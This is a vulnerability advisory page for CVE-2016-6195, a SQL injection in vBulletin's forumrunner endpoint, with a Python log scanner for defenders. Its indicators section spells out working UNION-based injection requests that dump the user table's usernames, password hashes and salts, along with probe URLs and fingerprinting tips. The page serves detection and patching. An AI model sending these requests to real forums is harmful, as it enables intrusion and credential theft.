CVE-2016-6195
published 2016-08-30

Priority: P187, critical
CVSS 3.0: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Tags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 68.49% (99.2th percentile)

SQL injection vulnerability in forumrunner/includes/moderation.php in vBulletin before 4.2.2 Patch Level 5 and 4.2.3 before Patch Level 1 allows remote attackers to execute arbitrary SQL commands via the postids parameter to forumrunner/request.php, as exploited in the wild in July 2016.

Affected

2 ranges
Vendor | Product | Version range | Fixed in
vbulletin | vbulletin | <= 4.2.2 |
vbulletin | vbulletin | |

Detection & IOCs (extracted from sources)

path: /forumrunner/request.php
path: /forumrunner/includes/moderation.php
url: {{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
url: {{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
url: {{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
url: {{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
url: {{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
url: {{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
command: GET /forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.tables)where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x),5,6,7,8,9,10-- -
command: GET /forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.columns)where (table_name=0x75736572) and (0x00) in (@x:=concat(@x,0x3c62723e,column_name))))x),5,6,7,8,9,10-- -
command: GET /forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (user)where (0x00) in (@x:=concat(@x,0x3c62723e,username,0x3a,password,0x3a,salt))))x),5,6,7,8,9,10-- -
  • HTTP response body containing 'type=dberror' indicates successful SQL injection triggering a database error in vBulletin forumrunner.
  • Probe multiple common vBulletin install sub-paths for forumrunner/request.php with a broken postids value (e.g., -1') to detect the vulnerable endpoint.
  • Shodan/FOFA fingerprinting: identify vBulletin instances via page title or HTML body containing 'powered by vbulletin' before targeting the forumrunner endpoint.
  • The SQL injection entry point is the 'postids' GET parameter in the 'get_spam_data' command of forumrunner/request.php; monitor for UNION-based payloads or unbalanced quotes in this parameter.
  • An HTTP 200 or 503 response status combined with 'type=dberror' in the body confirms that an exploitation attempt triggered a DB error response.
  • The vulnerability affects vBulletin 3.6.0 through 4.2.3; versions 4.2.2 Patch Level 5+ and 4.2.3 Patch Level 1+ are patched. Scope detection efforts to this version range.
  • This vulnerability was actively exploited in the wild as of July 2016; treat any unpatched vBulletin 3.6.0–4.2.3 instance as high-priority.
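
The monitoring guidance above, as an added example that is not part of the original page or of any vendor tooling: a log check that flags get_spam_data requests whose postids value is not a plain list of integers. It assumes combined-format access logs and that legitimate postids values are comma-separated integers; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate postids value is a comma-separated list of integers.
BENIGN_POSTIDS = re.compile(r"\d+(,\d+)*")
# Request line and status as they appear in a combined-format access log.
REQUEST_RE = re.compile(r'"(?:GET|POST) (.+?) HTTP/[\d.]+" (\d{3})')

def classify(line):
    """Return None for unrelated or benign lines, else a dict describing the hit."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    # Match the endpoint under any install sub-path (/forum/, /vb/, ...).
    if not parts.path.lower().endswith("/forumrunner/request.php"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # also URL-decodes values
    if "get_spam_data" not in qs.get("cmd", []):
        return None
    reasons = set()
    for value in qs.get("postids", []):
        if BENIGN_POSTIDS.fullmatch(value):
            continue
        if "'" in value or '"' in value:
            reasons.add("quote")
        if re.search(r"\bunion\b", value, re.IGNORECASE):
            reasons.add("union")
        reasons.add("non-numeric")
    if not reasons:
        return None
    status = int(m.group(2))
    # 200/503 are the statuses the page pairs with 'type=dberror' in the body;
    # the body itself is not in an access log and must be checked elsewhere.
    return {"path": parts.path, "status": status,
            "reasons": sorted(reasons), "dberror_status": status in (200, 503)}

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Jul/2016:10:01:02 +0000] "GET /forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27 HTTP/1.1" 200 512',
    '198.51.100.9 - - [12/Jul/2016:10:01:05 +0000] "GET /forumrunner/request.php?d=1&cmd=get_spam_data&postids=101,102 HTTP/1.1" 200 845',
    '203.0.113.7 - - [12/Jul/2016:10:01:09 +0000] "GET /forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)%20UNION%20select%201,2 HTTP/1.1" 503 230',
    '198.51.100.9 - - [12/Jul/2016:10:01:11 +0000] "GET /index.php HTTP/1.1" 200 1000',
]

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit here only shows that a malformed postids value reached the endpoint; whether the instance is vulnerable still depends on the installed patch level.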

CVSS provenance

nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck | 9.8 | CRITICAL